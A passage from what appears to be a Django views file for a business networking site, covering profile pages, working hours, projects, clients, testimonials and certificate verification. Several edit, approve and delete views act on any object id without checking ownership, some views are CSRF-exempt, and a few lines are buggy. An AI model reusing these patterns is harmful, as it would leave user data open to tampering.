request.user.groups.filter(name='COMPANY').exists()\n try:\n about = About.objects.get(user_id = id)\n except:\n about = \"\"\n is_following = Follow2.objects.filter(following_id=request.user.id, follower_id=id)\n instance = CustomUser.objects.get(id = id)\n userextend = UserExtend.objects.get(user_id=id)\n otheruser = int(id)\n otherusertb = CustomUser.objects.get(id= id)\n \n try:\n bioview = Bio.objects.get(user_id = id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = id)\n except:\n location = ''\n \n print(location)\n\n try:\n abouth = Aboutdetails.objects.get(user_id=request.user.id)\n except:\n abouth = \"\"\n\n\n\n expertiselist = Expertise.objects.filter(user_id=id)\n achievements = Achievements.objects.filter(user_id=id)\n projects = Projects.objects.filter(user_id=id)\n certificates = Certificate.objects.filter(user_id=id)\n clients = Client.objects.filter(user_id=id)\n branches = Branch.objects.filter(user_id=id)\n experiences = Experience.objects.filter(user_id=id)\n\n testimonial = Testimonial.objects.filter(user_id=id)\n \n following_count = Follow2.objects.filter(following_id = id).count()\n follower_count = Follow2.objects.filter(follower_id = id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=id, connection=1) | Q(user_id=id, connection=1)).count()\n \n is_following = Follow2.objects.filter(following_id = request.user.id, follower_id = id)\n endorse = Endorse.objects.filter(user_id = request.user.id, liked_person_id = id)\n if Connection.objects.filter(user_id = request.user.id, connected_person_id = id, connection = 0):\n is_connection = \"requested\"\n \n elif Connection.objects.filter(Q(connected_person_id=request.user.id, user_id=id, connection=1) | Q(user_id=request.user.id, connected_person_id=id, connection=1)):\n is_connection = \"connected\"\n \n else:\n is_connection = \"notConnected\"\n\n try:\n rating_view = Rating.objects.filter(rated_person = id).aggregate(Sum('rating'))\n rating_count = Rating.objects.filter(rated_person = id).count()\n e = (rating_view['rating__sum'])\n rating = e/rating_count\n except:\n rating = 0\n \n \n \n \n \n try:\n monview = Working.objects.get(day =1 ,user_id = id)\n \n except:\n monview = ''\n \n\n\n try:\n tueview = Working.objects.get(day =2,user_id = id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3, user_id = id)\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = id )\n \n except:\n sunview = ''\n \n\n context = {\n 'about':about,\n 'expertiselist': expertiselist,\n 'otheruser':otheruser,\n 'otherusertb':otherusertb,\n 'achievements': achievements,\n 'projects': projects,\n 'certificates': certificates,\n 'clients': clients,\n 'userextend':userextend,\n 'branches': branches,\n 'testimonial': testimonial,\n 'experiences':experiences,\n 'bioview':bioview,\n 'monview': monview,\n 'tueview': tueview,\n 'wedview': wedview,\n 'thuview': thuview,\n 'friview': friview,\n 'satview': satview,\n 'sunview': sunview,\n 'connection':is_following,\n 'instance':instance,\n 'company' :company,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n \n 'connection':is_following,\n 'endorse':endorse,\n 'is_connection':is_connection,\n \n 'location':location,\n 'rating':rating,\n 'abouth':abouth,\n }\n return render(request,'profile/profile-company.html',context)\n\n\n@login_required(login_url = 'login')\ndef userprofileview(request ,id):\n company = request.user.groups.filter(name='COMPANY').exists()\n otheruser = id\n otherusertb = CustomUser.objects.get(id= id)\n instance = CustomUser.objects.get(id=id)\n is_following = Follow2.objects.filter(following_id=request.user.id, follower_id=id)\n userextend = UserExtend.objects.get(user_id=id)\n try:\n bioview = Bio.objects.get(user_id = id)\n except:\n bioview =\"\"\n \n try:\n location = Location.objects.get(user_id = id)\n except:\n location = ''\n\n #star rating view\n try:\n rating_view = Rating.objects.filter(rated_person = id).aggregate(Sum('rating'))\n rating_count = Rating.objects.filter(rated_person = id).count()\n e = (rating_view['rating__sum'])\n rating = e/rating_count\n except:\n rating = 0\n\n try:\n abouth = Aboutdetails.objects.get(user_id=id)\n except:\n abouth = \"\"\n\n expertiselist = Expertise.objects.filter(user_id=id)\n achievements = Achievements.objects.filter(user_id=id)\n projects = Projects.objects.filter(user_id=id)\n experiences = Experience.objects.filter(user_id=id)\n certificates = Certificate.objects.filter(user_id=id)\n testimonials = Testimonial.objects.filter(user_id=id)\n clients = Client.objects.filter(user_id=id)\n \n following_count = Follow2.objects.filter(following_id = id).count()\n follower_count = Follow2.objects.filter(follower_id = id).count()\n endorse_count = Endorse.objects.filter(liked_person_id =id).count()\n connection_count = Connection.objects.filter(Q(connected_person_id=id, connection=1) | Q(user_id=id, connection=1)).count()\n \n is_following = Follow2.objects.filter(following_id = request.user.id, follower_id = id)\n endorse = Endorse.objects.filter(user_id = request.user.id, liked_person_id = id)\n if Connection.objects.filter(user_id = request.user.id, connected_person_id = id, connection = 0):\n is_connection = \"requested\"\n elif Connection.objects.filter(Q(connected_person_id=request.user.id, user_id=id, connection=1) | Q(user_id=request.user.id, connected_person_id=id, connection=1)):\n is_connection = \"connected\"\n else:\n is_connection = \"notConnected\"\n \n \n \n \n try:\n monview = Working.objects.get(day =1 ,user_id =id)\n \n except:\n monview = ''\n \n\n\n try:\n tueview = Working.objects.get(day =2,user_id = id )\n \n except:\n tueview = ''\n \n\n try:\n wedview = Working.objects.get(day =3, user_id = id)\n \n except:\n wedview = ''\n \n\n try:\n thuview = Working.objects.get(day =4,user_id = id )\n \n except:\n thuview = ''\n \n\n try:\n friview = Working.objects.get(day =5,user_id = id )\n \n except:\n friview = ''\n \n\n try:\n satview = Working.objects.get(day =6,user_id = id )\n \n except:\n satview = ''\n \n\n try:\n sunview = Working.objects.get(day =7,user_id = id )\n \n except:\n sunview = ''\n\n try:\n abouth = Aboutdetails.objects.get(user_id=id)\n except:\n abouth = \"\"\n \n\n context = {\n\n 'expertiselist': expertiselist,\n 'userextend':userextend,\n 'otheruser':otheruser,\n 'achievements': achievements,\n 'projects': projects,\n 'experiences': experiences,\n 'certificates': certificates,\n 'testimonials': testimonials,\n 'otherusertb':otherusertb,\n\n 'clients': clients,\n 'bioview':bioview,\n 'monview': monview,\n 'tueview': tueview,\n 'wedview': wedview,\n 'thuview': thuview,\n 'friview': friview,\n 'satview': satview,\n 'sunview': sunview,\n 'connection': is_following,\n 'instance': instance,\n 'company':company,\n \n 'following_count':following_count,\n 'follower_count':follower_count,\n 'endorse_count':endorse_count,\n 'connection_count':connection_count,\n \n 'connection':is_following,\n 'endorse':endorse,\n 'is_connection':is_connection,\n \n 'location':location,\n 'rating':rating,\n 'abouth':abouth,\n \n \n \n\n }\n return render(request,'profile/profile-user.html',context)\n\n\n@login_required(login_url = 'login')\ndef experience(request):\n return render(request,'profile/experience.html')\n\n@login_required(login_url = 'login')\ndef experiencelist(request,id):\n experiences = Experience.objects.filter(user_id = id)\n context = {\n 'experiences':experiences,\n }\n return render(request,'profile/experiencelist.html',context)\n\n\n##############adding working hours #############\n\n@login_required(login_url = 'login')\ndef addworking(request):\n\n try:\n\n \n mondview = Working.objects.get(user_id=request.user.id,day = 1)\n\n \n\n if request.method == \"POST\":\n Moncheck = request.POST.get('moncheck')\n Monstart = request.POST.get('monstartime')\n\n Monend = request.POST.get('monendtime')\n MonBrk1st = request.POST.get('monbreaktime1st')\n MonBrk1en = request.POST.get('monbreaktime1en')\n MonBrk2st = request.POST.get('monbreaktime2st')\n MonBrk2en = request.POST.get('monbreaktime2en')\n\n mondview.start_time = Monstart\n mondview.end_time = Monend\n mondview.breaktimef_start = MonBrk1st\n mondview.breaktimef_end = MonBrk1en\n mondview.breaktimes_start = MonBrk2st\n mondview.breaktimes_end = MonBrk2en\n mondview.day = 1\n mondview.save()\n\n except:\n \n\n Moncheck = request.POST.get('moncheck')\n Monstart = request.POST.get('monstartime')\n Monend = request.POST.get('monendtime')\n MonBrk1st = request.POST.get('monbreaktime1st')\n MonBrk1en = request.POST.get('monbreaktime1en')\n MonBrk2st = request.POST.get('monbreaktime2st')\n MonBrk2en = request.POST.get('monbreaktime2en')\n\n\n\n if request.method == \"POST\":\n if Moncheck:\n working = Working()\n working.start_time = Monstart\n working.end_time = Monend\n working.breaktimef_start = MonBrk1st\n working.breaktimef_end = MonBrk1en\n working.breaktimes_start = MonBrk2st\n working.breaktimes_end = MonBrk2en\n working.day = 1\n working.user_id = request.user.id\n working.save()\n \n\n\n try:\n\n tueview = Working.objects.get(user_id=request.user.id, day=2)\n \n\n if request.method == \"POST\":\n Tuecheck = request.POST.get('tuecheck')\n Tuestart = request.POST.get('tuestartime')\n Tueend = request.POST.get('tueendtime')\n TueBrk1st = request.POST.get('tuebreaktime1st')\n TueBrk1en = request.POST.get('tuebreaktime1en')\n TueBrk2st = request.POST.get('tuebreaktime2st')\n TueBrk2en = request.POST.get('tuebreaktime2en')\n\n tueview.start_time = Tuestart\n tueview.end_time = Tueend\n tueview.breaktimef_start = TueBrk1st\n tueview.breaktimef_end = TueBrk1en\n tueview.breaktimes_start = TueBrk2st\n tueview.breaktimes_end = TueBrk2en\n tueview.day = 2\n tueview.save()\n\n except:\n \n if request.method == \"POST\":\n Tuecheck = request.POST.get('tuecheck')\n Tuestart = request.POST.get('tuestartime')\n Tueend = request.POST.get('tueendtime')\n TueBrk1st = request.POST.get('tuebreaktime1st')\n TueBrk1en = request.POST.get('tuebreaktime1en')\n TueBrk2st = request.POST.get('tuebreaktime2st')\n TueBrk2en = request.POST.get('tuebreaktime2en')\n if Tuecheck:\n working = Working()\n working.start_time = Tuestart\n working.end_time = Tueend\n working.breaktimef_start = TueBrk1st\n working.breaktimef_end = TueBrk1en\n working.breaktimes_start = TueBrk2st\n working.breaktimes_end = TueBrk2en\n working.day = 2\n working.user_id = request.user.id\n working.save()\n \n\n\n \n\n try:\n wedview = Working.objects.get(user_id=request.user.id, day=3)\n \n\n if request.method == \"POST\":\n Wedcheck = request.POST.get('wedcheck')\n Wedstart = request.POST.get('wedstartime')\n Wedend = request.POST.get('wedendtime')\n WedBrk1st = request.POST.get('wedbreaktime1st')\n WedBrk1en = request.POST.get('wedbreaktime1en')\n WedBrk2st = request.POST.get('wedbreaktime2st')\n WedBrk2en = request.POST.get('wedbreaktime2en')\n\n wedview.start_time = Wedstart\n wedview.end_time = Wedend\n wedview.breaktimef_start = WedBrk1st\n wedview.breaktimef_end = WedBrk1en\n wedview.breaktimes_start = WedBrk2st\n wedview.breaktimes_end = WedBrk2en\n wedview.day = 3\n wedview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Wedcheck = request.POST.get('wedcheck')\n Wedstart = request.POST.get('wedstartime')\n Wedend = request.POST.get('wedendtime')\n WedBrk1st = request.POST.get('wedbreaktime1st')\n WedBrk1en = request.POST.get('wedbreaktime1en')\n WedBrk2st = request.POST.get('wedbreaktime2st')\n WedBrk2en = request.POST.get('wedbreaktime2en')\n if Wedcheck:\n working = Working()\n working.start_time = Wedstart\n working.end_time = Wedend\n working.breaktimef_start = WedBrk1st\n working.breaktimef_end = WedBrk1en\n working.breaktimes_start = WedBrk2st\n working.breaktimes_end = WedBrk2en\n working.day = 3\n working.user_id = request.user.id\n working.save()\n \n\n try:\n thuview = Working.objects.get(user_id=request.user.id, day=4)\n \n\n if request.method == \"POST\":\n Thucheck = request.POST.get('thucheck')\n Thustart = request.POST.get('thustartime')\n Thuend = request.POST.get('thuendtime')\n ThuBrk1st = request.POST.get('thubreaktime1st')\n ThuBrk1en = request.POST.get('thubreaktime1en')\n ThuBrk2st = request.POST.get('thubreaktime2st')\n ThuBrk2en = request.POST.get('thubreaktime2en')\n\n thuview.start_time = Thustart\n thuview.end_time = Thuend\n thuview.breaktimef_start = ThuBrk1st\n thuview.breaktimef_end = ThuBrk1en\n thuview.breaktimes_start = ThuBrk2st\n thuview.breaktimes_end = ThuBrk2en\n thuview.day = 4\n thuview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Thucheck = request.POST.get('thucheck')\n Thustart = request.POST.get('thustartime')\n Thuend = request.POST.get('thuendtime')\n ThuBrk1st = request.POST.get('thubreaktime1st')\n ThuBrk1en = request.POST.get('thubreaktime1en')\n ThuBrk2st = request.POST.get('thubreaktime2st')\n ThuBrk2en = request.POST.get('thubreaktime2en')\n if Thucheck:\n working = Working()\n working.start_time = Thustart\n working.end_time = Thuend\n working.breaktimef_start = ThuBrk1st\n working.breaktimef_end = ThuBrk1en\n working.breaktimes_start = ThuBrk2st\n working.breaktimes_end = ThuBrk2en\n working.day = 4\n working.user_id = request.user.id\n working.save()\n \n\n try:\n friview = Working.objects.get(user_id=request.user.id, day=5)\n \n\n if request.method == \"POST\":\n Fricheck = request.POST.get('fricheck')\n Fristart = request.POST.get('fristartime')\n Friend = request.POST.get('friendtime')\n FriBrk1st = request.POST.get('fribreaktime1st')\n FriBrk1en = request.POST.get('fribreaktime1en')\n FriBrk2st = request.POST.get('fribreaktime2st')\n FriBrk2en = request.POST.get('fribreaktime2en')\n\n friview.start_time = Fristart\n friview.end_time = Friend\n friview.breaktimef_start = FriBrk1st\n friview.breaktimef_end = FriBrk1en\n friview.breaktimes_start = FriBrk2st\n friview.breaktimes_end = FriBrk2en\n friview.day = 5\n friview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Fricheck = request.POST.get('fricheck')\n Fristart = request.POST.get('fristartime')\n Friend = request.POST.get('friendtime')\n FriBrk1st = request.POST.get('fribreaktime1st')\n FriBrk1en = request.POST.get('fribreaktime1en')\n FriBrk2st = request.POST.get('fribreaktime2st')\n FriBrk2en = request.POST.get('fribreaktime2en')\n if Fricheck:\n working = Working()\n working.start_time = Fristart\n working.end_time = Friend\n working.breaktimef_start = FriBrk1st\n working.breaktimef_end = FriBrk1en\n working.breaktimes_start = FriBrk2st\n working.breaktimes_end = FriBrk2en\n working.day = 5\n working.user_id = request.user.id\n working.save()\n \n\n try:\n satview = Working.objects.get(user_id=request.user.id, day=6)\n \n\n if request.method == \"POST\":\n Satcheck = request.POST.get('satcheck')\n Satstart = request.POST.get('satstartime')\n Satend = request.POST.get('satendtime')\n SatBrk1st = request.POST.get('satbreaktime1st')\n SatBrk1en = request.POST.get('satbreaktime1en')\n SatBrk2st = request.POST.get('satbreaktime2st')\n SatBrk2en = request.POST.get('satbreaktime2en')\n\n satview.start_time =Satstart\n satview.end_time = Satend\n satview.breaktimef_start = SatBrk1st\n satview.breaktimef_end = SatBrk1en\n satview.breaktimes_start = SatBrk2st\n satview.breaktimes_end = SatBrk2en\n satview.day = 6\n satview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Satcheck = request.POST.get('satcheck')\n\n\n Satstart = request.POST.get('satstartime')\n Satend = request.POST.get('satendtime')\n SatBrk1st = request.POST.get('satbreaktime1st')\n SatBrk1en = request.POST.get('satbreaktime1en')\n SatBrk2st = request.POST.get('satbreaktime2st')\n SatBrk2en = request.POST.get('satbreaktime2en')\n if Satcheck:\n working = Working()\n working.start_time = Satstart\n working.end_time = Satend\n working.breaktimef_start = SatBrk1st\n working.breaktimef_end = SatBrk1en\n working.breaktimes_start = SatBrk2st\n working.breaktimes_end = SatBrk2en\n working.day = 6\n working.user_id = request.user.id\n working.save()\n \n\n try:\n sunview = Working.objects.get(user_id=request.user.id, day=7)\n \n\n if request.method == \"POST\":\n Suncheck = request.POST.get('suncheck')\n Sunstart = request.POST.get('sunstartime')\n Sunend = request.POST.get('sunendtime')\n SunBrk1st = request.POST.get('sunbreaktime1st')\n SunBrk1en = request.POST.get('sunbreaktime1en')\n SunBrk2st = request.POST.get('sunbreaktime2st')\n SunBrk2en = request.POST.get('sunbreaktime2en')\n\n sunview.start_time =Sunstart\n sunview.end_time = Sunend\n sunview.breaktimef_start = SunBrk1st\n sunview.breaktimef_end = SunBrk1en\n sunview.breaktimes_start = SunBrk2st\n sunview.breaktimes_end = SunBrk2en\n sunview.day = 7\n sunview.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n except:\n\n \n\n if request.method == \"POST\":\n Suncheck = request.POST.get('suncheck')\n Sunstart = request.POST.get('sunstartime')\n Sunend = request.POST.get('sunendtime')\n SunBrk1st = request.POST.get('sunbreaktime1st')\n SunBrk1en = request.POST.get('sunbreaktime1en')\n SunBrk2st = request.POST.get('sunbreaktime2st')\n SunBrk2en = request.POST.get('sunbreaktime2en')\n if Suncheck:\n working = Working()\n working.start_time = Sunstart\n working.end_time = Sunend\n working.breaktimef_start = SunBrk1st\n working.breaktimef_end = SunBrk1en\n working.breaktimes_start = SunBrk2st\n working.breaktimes_end = SunBrk2en\n working.day = 7\n working.user_id = request.user.id\n working.save()\n \n\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef transalator(request):\n if request.method == \"POST\":\n text = request.POST.get('texts')\n \n \n \n \n \n \n phone_number1 = phonenumbers.parse(text)\n \n \n \n phone_number2 = phonenumbers.parse(text)\n \n\n\n return render(request,'transalator.html')\n\n@login_required(login_url = 'login')\ndef aboutus(request):\n form = AboutForm\n if request.method== \"POST\":\n form = AboutForm(request.POST)\n about = form.save(commit = False)\n about.user_id = request.user.id\n about.save()\n return render(request, 'profile/profile-company-edit.html')\n\n@login_required(login_url = 'login')\ndef achievements(request):\n AchievementFormSet = modelformset_factory(Achievement, fields=('name',), extra=3)\n\n if request.method == \"POST\":\n formset = AchievementFormSet(request.POST)\n instances = formset.save(commit=False)\n\n for instance in instances:\n instance.user_id = request.user.id\n instance.save()\n\n formset = AchievementFormSet(queryset = Achievement.objects.filter(user_id = request.user.id))\n\n context = {'formset': formset}\n\n return render(request, 'profile/profile-company-edit.html',context)\n\n@login_required(login_url = 'login')\ndef addlocation(request):\n try:\n \n location = Location.objects.get(user_id = request.user.id )\n \n if request.method == \"POST\":\n locat= request.POST.get('location') \n \n location.place = locat\n location.user_id = request.user.id\n location.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n except:\n \n if request.method == \"POST\":\n \n location = request.POST.get('location') \n loc = Location()\n loc.place = location\n loc.user_id = request.user.id\n loc.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n \n \n\n@login_required(login_url = 'login')\ndef projects(request):\n form = ProjectsForm()\n if request.method == \"POST\":\n form = ProjectsForm(request.POST)\n productname = request.POST.get('project_name')\n company = request.POST.get('company_name')\n authority = request.POST.get('company_name_id')\n if authority:\n auth = int(authority)\n \n projects = Projects()\n projects.user_id = request.user.id\n projects.authname = company \n projects.project_name = productname\n if authority:\n projects.auth_id = auth \n \n projects.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editprojects(request,id):\n pro = Projects.objects.get(id = id)\n if request.method == \"POST\":\n Proj = request.POST.get('project_name')\n Comp = request.POST.get('company_name_edit')\n authority = request.POST.get('company_name_edit_id')\n if authority:\n autho = int(authority)\n pro.authname = Comp\n \n pro.project_name = Proj\n if authority:\n pro.auth_id = autho\n pro.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\n@login_required(login_url = 'login')\ndef cexpertise(request):\n CexpertiseFormset = modelformset_factory(Cexepertise,fields = ('profession','year'),extra = 3)\n if request.method == \"POST\":\n cexpertiseForm = CexpertiseFormset(request.POST)\n instances = cexpertiseForm(commit = False)\n for instance in instances:\n instance.user_id = request.user.id\n instance.save()\n cexpertiseForm = CexpertiseFormset(queryset = Cexepertise.objects.filter(user_id = request.user.id))\n context = {\n 'cexpertiseForm':cexpertiseForm\n }\n return render(request, 'profile/profile-company-edit.html', context)\n\n\n@csrf_exempt\n@login_required(login_url = 'login')\ndef addabout(request):\n try:\n\n a = 1\n \n view = About.objects.get(user_id =request.user.id )\n form = AboutForm(instance = view)\n if request.method == \"POST\":\n form = AboutForm(request.POST,instance = view)\n if form.is_valid():\n z = form.save()\n ser_instance = serializers.serialize('json', [z, ])\n return JsonResponse({\"instance\": ser_instance}, status=200)\n else:\n return JsonResponse({\"error\": form.errors}, status=400)\n\n\n\n except:\n\n a = 2\n \n form = AboutForm()\n if request.method == \"POST\":\n form = AboutForm(request.POST or None)\n if form.is_valid():\n form = AboutForm(request.POST)\n about = form.save(commit=False)\n about.user_id = request.user.id\n about.save()\n return HttpResponse('added')\n else:\n return HttpResponse('invalid')\n\n return JsonResponse({\"error\": \"\"}, status=400)\n\n\n@login_required(login_url = 'login')\ndef expertise(request):\n \n form = ExpertiseForm()\n if request.method == \"POST\":\n \n exp = request.POST.get('expertise')\n expid = request.POST.get('expertise_id')\n form = ExpertiseForm(request.POST)\n if form.is_valid():\n experti = form.save(commit = False)\n experti.user_id = request.user.id\n experti.authname = exp\n if expid:\n experti.auth_id = expid\n experti.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef editexpertise(request,id):\n exp = Expertise.objects.get(id = id)\n expedit = request.POST.get('expertise_edit')\n expid = request.POST.get('expertise_edit_id')\n \n print(expedit,expid)\n if request.method == \"POST\":\n a = request.POST.get('profession')\n b = request.POST.get('expertisein')\n c = request.POST.get('years')\n d = request.POST.get('description')\n exp.profession = a\n exp.expertisein = b\n exp.years = c\n exp.description = d\n if expid:\n exp.auth_id = expid\n exp.authname = expedit \n exp.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@csrf_exempt\n@login_required(login_url = 'login')\ndef addachievements(request):\n form = AchievementsForm()\n if request.method == \"POST\":\n form = AchievementsForm(request.POST)\n ach = request.POST.get('achievementss')\n achid = request.POST.get('achievementss_id')\n if achid:\n achi = int(achid)\n if form.is_valid():\n achievement = form.save(commit = False)\n achievement.user_id = request.user.id\n achievement.authname = ach\n if achid:\n achievement.auth_id = achi\n achievement.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editachievements(request,id):\n ach = Achievements.objects.get(id= id)\n if request.method == \"POST\":\n tit = request.POST.get('achievementtitle')\n ache = request.POST.get('achievementss_edit')\n achid = request.POST.get('achievementss_edit_id')\n \n \n des = request.POST.get('description')\n \n if achid:\n achi = int(achid)\n ach.auth_id = achi\n ach.authname = ache\n ach.description= des\n ach.title = tit\n ach.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@csrf_exempt\n@login_required(login_url = 'login')\ndef experience(request):\n form = ExperienceForm()\n if request.method == \"POST\":\n companyid = request.POST.get('company-name_id')\n companyname = request.POST.get('company-name')\n \n company = request.POST.get('company')\n if companyid:\n cid = int(companyid)\n form = ExperienceForm(request.POST,request.FILES)\n if form.is_valid():\n exp = form.save(commit = False)\n exp.user_id = request.user.id\n exp.company_name = companyname\n if companyid:\n exp.company_id = cid\n exp.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editexperience(request,id):\n exp = Experience.objects.get(id = id)\n if request.method == \"POST\":\n fromyear = request.POST.get('fromyear')\n toyear = request.POST.get('toyear')\n companyname = request.POST.get('company-name_edit')\n \n company_id = request.POST.get('client-name_edit_id')\n if company_id:\n cid = int(companyname)\n exp_keywords = request.POST.get('exp_keywords')\n expdetail = request.POST.get('exp_detail')\n comments = request.POST.get('comments')\n responsibility = request.POST.get('responsibility')\n expimage = request.POST.get('expimage')\n\n exp.fromyear = fromyear\n if company_id:\n exp.company_id = cid\n exp.company_name = companyname\n exp.toyear = toyear\n exp.exp_keywords = exp_keywords\n exp.exp_detail = expdetail\n exp.comments = comments\n exp.responsibily = responsibility\n exp.expimage = expimage\n exp.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addclient(request):\n form = ClientForm()\n if request.method == \"POST\":\n ClientName = request.POST.get('client-name')\n Client = request.POST.get('client-name_id')\n Img = request.FILES.get('clientImage')\n if Client:\n c= int(Client)\n form = ClientForm(request.POST,request.FILES)\n if form.is_valid():\n client = form.save(commit = False)\n client.user_id = request.user.id\n client.clientname = ClientName\n if Img:\n client.clientimage = Img\n if Client:\n client.client_id = c\n client.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editclient(request,id):\n cli = Client.objects.get(id = id)\n if request.method == \"POST\":\n ClientName = request.POST.get('client-name_edit')\n Cliid = request.POST.get('client-name_edit_id')\n Cliimage = request.FILES.get('clientimage')\n Clidesc = request.POST.get('client_description')\n\n\n \n if Cliid:\n cid = int(Cliid)\n cli.client_id = cid\n if Cliimage:\n cli.clientimage = Cliimage\n else:\n pass\n cli.client_description = Clidesc\n cli.clientname = ClientName\n cli.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\n@login_required(login_url = 'login')\ndef addtestimonial(request):\n form = TestimonialForm()\n if request.method == \"POST\":\n Test = request.POST.get('testicliName')\n Testid = request.POST.get('testicliName-id')\n \n \n form = TestimonialForm(request.POST,request.FILES)\n if form.is_valid():\n testimonial = form.save(commit = False)\n \n testimonial.user_id = request.user.id\n testimonial.testimonial_name = Test\n if Testid:\n d =int(Testid)\n \n testimonial.testuser_id = d\n testimonial.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef edittestimonial(request,id):\n test = Testimonial.objects.get(id = id)\n if request.method == \"POST\":\n Test = request.POST.get('testicliNameEdit')\n Testid = request.POST.get('testicliName-idEdit{{i.id}}')\n TestImg = request.FILES.get('testimonial_image')\n Testdesc = request.POST.get('testimonial_description')\n\n \n \n test.testimonial_name = Test\n\n if TestImg:\n test.testimonial_image = TestImg\n else:\n pass\n \n if Testid:\n Clname = int(Testid)\n test.testuser_id = Clname\n test.testimonial_description = Testdesc\n test.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef addcertificate(request):\n form = CertificateForm()\n if request.method == \"POST\":\n AuthorityName = request.POST.get('issued_authority')\n Authority = request.POST.get('issued_authority_id')\n \n \n if Authority:\n a = int(Authority)\n\n \n form = CertificateForm(request.POST,request.FILES)\n if form.is_valid():\n certificate = form.save(commit = False)\n certificate.user_id = request.user.id\n if Authority:\n certificate.authority_id = a\n certificate.company_name = AuthorityName\n certificate.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editcertificate(request,id):\n \n cer = Certificate.objects.get(id = id)\n if request.method == \"POST\":\n isauth = request.POST.get('issued_authority_edit_id')\n authname = request.POST.get('issued_authority_edit')\n Cername = request.POST.get('certificate_name')\n CerId = request.POST.get('certificate_id')\n CerIma = request.FILES.get('certificate_image')\n CerDes = request.POST.get('certificate_description')\n \n\n\n \n if isauth :\n IA = int(isauth)\n \n if isauth :\n cer.authority_id = IA\n cer.certificate_name = Cername\n \n cer.certificate_id = CerId\n cer.company_name = authname\n\n if CerIma:\n cer.certificate_image = CerIma\n else:\n pass\n cer.certificate_description = CerDes\n\n\n\n cer.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addbranch(request):\n form = BranchForm()\n if request.method == \"POST\":\n form = BranchForm(request.POST,request.FILES)\n if form.is_valid():\n certificate = form.save(commit = False)\n certificate.user_id = request.user.id\n certificate.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef editbranch(request,id):\n\n branch = Branch.objects.get(id = id)\n if request.method == \"POST\":\n branchP = request.POST.get('branch')\n branchAddres = request.POST.get('branchaddress')\n\n branch.branch= branchP\n branch.branchaddress = branchAddres\n branch.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\n\n######################################CERTIFICATE verification ##################################\n@login_required(login_url = 'login')\ndef verifycertificate(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n \n pending = Certificate.objects.filter(authority_id = request.user.id ,is_requested = 1,is_approved = 0,is_rejected = 0)\n approved = Certificate.objects.filter(authority_id = request.user.id,is_requested = 1,is_approved = 1,is_rejected = 0)\n companies = CustomUser.objects.all()\n \n context = {\n 'pending':pending,\n 'approved':approved,\n 'companies':companies,\n 'company':company,\n }\n return render(request,'verification/verification-certificate.html',context)\n\n@login_required(login_url = 'login')\ndef approvecertificate(request,id):\n \n approve = Certificate.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n\n Cer = approve.authority_id\n\n notify = Notification()\n notify.user_id = request.user.id\n notify.sender_id = Cer\n notify.notification_type = 3\n notify.save()\n return redirect('verifycertificate')\n\n@login_required(login_url = 'login')\ndef deletecertificate(request,id):\n dele = Certificate.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n \n return redirect('verifycertificate')\n\n@login_required(login_url = 'login')\ndef editverificationcertificate(request,id):\n cer = Certificate.objects.get(id = id)\n if request.method == \"POST\":\n Cername = request.POST.get('certificate_name')\n CerId = request.POST.get('certificate_id')\n CerIma = request.FILES.get('certificate_image')\n CerDes = request.POST.get('certificate_description')\n\n \n cer.certificate_name = Cername\n cer.certificate_id = CerId\n if CerIma:\n cer.certificate_image = CerIma\n else:\n pass\n\n cer.certificate_description = CerDes\n cer.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendvercertificate(request,id):\n\n sendreq = Certificate.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n\n\n\n\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\n\n###################CLIENT verification ######################################\n@login_required(login_url = 'login')\ndef verifyclient(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n 